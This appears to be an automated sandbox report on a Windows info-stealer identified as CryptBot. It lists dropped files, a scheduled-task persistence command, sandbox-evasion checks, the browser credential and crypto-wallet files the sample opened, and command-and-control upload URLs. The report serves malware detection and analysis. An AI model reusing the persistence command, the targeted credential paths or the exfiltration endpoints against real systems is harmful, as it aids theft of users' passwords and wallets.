Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D3E20	6_2_002D3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2ECD00	6_2_6C2ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2EEE50	6_2_6C2EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3A4E80	6_2_6C3A4E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2F0FC0	6_2_6C2F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C330870	6_2_6C330870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C322A7E	6_2_6C322A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C324490	6_2_6C324490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2F44F0	6_2_6C2F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C318570	6_2_6C318570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C320580	6_2_6C320580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C312110	6_2_6C312110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32FE10	6_2_6C32FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C321E40	6_2_6C321E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2F5880	6_2_6C2F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32D99E	6_2_6C32D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C33DA20	6_2_6C33DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C30F510	6_2_6C30F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3196A0	6_2_6C3196A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3277D0	6_2_6C3277D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2E3000	6_2_6C2E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2F70C0	6_2_6C2F70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3211BE	6_2_6C3211BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3312C0	6_2_6C3312C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32F3C0	6_2_6C32F3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3B5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3B38D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3AAB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3B3490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3B3310 appears 43 times

Source: file.exe, 00000000.00000002.2987967621.000000000E09B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exe.muij% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\bOfGAEjSfH

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\xsBddhclvCKPtYMSTzPC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uagceqkeyclcamtokqdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uagceqkeyclcamtokqdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uagceqkeyclcamtokqdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uagceqkeyclcamtokqdi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 7257088 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c3000
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1ab200

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 6_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

6_2_002D8230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: uAGceqKEYCLcAMToKQDI.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002DA499 push es; iretd	6_2_002DA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C328C2A push edx; mov dword ptr [esp], ebx	6_2_6C328C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C354DB0 push eax; mov dword ptr [esp], ebx	6_2_6C355018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C334DC1 push eax; mov dword ptr [esp], ebx	6_2_6C334DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C326E03 push edx; mov dword ptr [esp], ebx	6_2_6C326E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C334FA1 push eax; mov dword ptr [esp], ebx	6_2_6C334FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C35E860 push eax; mov dword ptr [esp], ebx	6_2_6C35E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C330852 push eax; mov dword ptr [esp], ebx	6_2_6C330866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C348850 push eax; mov dword ptr [esp], ebx	6_2_6C348E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C33285C push edx; mov dword ptr [esp], ebx	6_2_6C332870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3629A0 push eax; mov dword ptr [esp], ebx	6_2_6C362CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3629A0 push edx; mov dword ptr [esp], ebx	6_2_6C362CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3909E0 push eax; mov dword ptr [esp], edi	6_2_6C390B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C35EAC0 push eax; mov dword ptr [esp], ebx	6_2_6C35EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C334BE1 push eax; mov dword ptr [esp], ebx	6_2_6C334BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C370460 push eax; mov dword ptr [esp], ebx	6_2_6C3707FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C320452 push eax; mov dword ptr [esp], ebx	6_2_6C32048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C338451 push 890005EAh; ret	6_2_6C338459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3204BE push eax; mov dword ptr [esp], ebx	6_2_6C32048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3264A3 push edx; mov dword ptr [esp], ebx	6_2_6C3264B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3204AD push eax; mov dword ptr [esp], ebx	6_2_6C32048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32A527 push eax; mov dword ptr [esp], ebx	6_2_6C32A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C301AAA push eax; mov dword ptr [esp], ebx	6_2_6C3B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C301AAA push eax; mov dword ptr [esp], ebx	6_2_6C3B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32A6F7 push eax; mov dword ptr [esp], ebx	6_2_6C32A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C306003 push eax; mov dword ptr [esp], ebx	6_2_6C3B6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C306003 push edx; mov dword ptr [esp], edi	6_2_6C3B6B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C306098 push eax; mov dword ptr [esp], ebx	6_2_6C3B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3340D5 push ecx; mov dword ptr [esp], ebx	6_2_6C3340E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C3281E5 push edx; mov dword ptr [esp], ebx	6_2_6C3281F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C32023B push eax; mov dword ptr [esp], ebx	6_2_6C320251

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\uAGceqKEYCLcAMToKQDI.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_6-158057

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_6-158058

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Window / User API: threadDelayed 1866			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Window / User API: threadDelayed 8133			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\file.exe TID: 6352	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6352	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2108	Thread sleep count: 1866 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2108	Thread sleep time: -186600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2108	Thread sleep count: 8133 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2108	Thread sleep time: -813300s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2986546316.000000000126E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2986546316.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2986546316.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 6_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

6_2_002D8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	6_2_002D116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	6_2_002D1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	6_2_002D11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	6_2_002D13C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 6_2_6C368280 cpuid

6_2_6C368280

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 6.2.service123.exe.6c2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2969253307.0000000004057000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 6020, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 6356, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe	String found in binary or memory: com.liberty.jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: exodus
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 6356, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 6356, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win32.Trojan.CryptBot

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtbb17sb.top	193.46.218.44	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
7sb.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
bb17sb.top	true		unknown
sb.top	true		unknown
@sevtbb17sb.top	true		unknown
EFsevtbb17sb.top	true		unknown
sevtbb17sb.top	true		unknown
b17sb.top	true		unknown
icsevtbb17sb.top	true		unknown
+sevtbb17sb.top	true		unknown
oosevtbb17sb.top	true		unknown
POSTb17sb.top	true		unknown
ozsevtbb17sb.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://sevtbb17sb.top/_	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	uAGceqKEYCLcAMToKQDI.dll.0.dr	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.php4	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php.	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.php0	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/X	file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php:	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php6	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
